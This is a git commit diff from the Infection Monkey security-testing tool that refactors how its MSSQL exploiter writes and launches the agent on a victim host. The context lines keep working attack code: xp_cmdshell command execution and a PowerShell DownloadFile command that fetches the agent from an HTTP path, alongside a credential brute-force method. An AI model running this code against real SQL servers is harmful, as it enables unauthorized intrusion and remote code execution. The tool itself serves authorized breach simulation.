Agent: Refactor MSSQL run agent commands

Remove the dependency on the MSSQLLimitedSizePayload and use simple methods like "_write_command_to_batch_file()".
2022-06-14 12:51:43 -04:00 · 2022-06-14 12:51:43 -04:00 · f349e1a334
parent b2aa8333c3
commit f349e1a334
1 changed files with 7 additions and 15 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -36,7 +36,6 @@ class MSSQLExploiter(HostExploiter):

    XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
    XP_CMDSHELL_COMMAND_END = "'"
-    EXPLOIT_COMMAND_PREFIX = "<nul set /p="
    MONKEY_DOWNLOAD_COMMAND = (
        "powershell (new-object System.Net.WebClient)."
        "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -117,14 +116,13 @@ class MSSQLExploiter(HostExploiter):
        self.run_mssql_commands(array_of_commands)

    def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
-        monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
-        logger.debug(
-            f"Launching the agent: {monkey_launch_command.prefix} -- "
-            f"{monkey_launch_command.command} -- {monkey_launch_command.suffix}"
-        )
-        self.run_mssql_command(monkey_launch_command)
+        self._write_agent_launch_command_to_batch_file(monkey_path_on_victim)
        self.run_payload_file()

+    def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim):
+        agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
+        self._write_command_to_batch_file(agent_launch_command)
+
    def run_mssql_commands(self, cmds):
        for cmd in cmds:
            logger.debug(f"Running command on SQL Server: {cmd}")
@ -170,17 +168,11 @@ class MSSQLExploiter(HostExploiter):
        sleep(MSSQLExploiter.QUERY_BUFFER)

    def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
-        # Form monkey's launch command
        monkey_args = build_monkey_commandline(
            self.host, self.current_depth - 1, monkey_path_on_victim
        )
-        suffix = ">{}".format(self.payload_file_path)
-        prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
-        return MSSQLLimitedSizePayload(
-            command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
-            prefix=prefix,
-            suffix=suffix,
-        )
+
+        return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}"

    def brute_force(self, host, port, users_passwords_pairs_list):
        """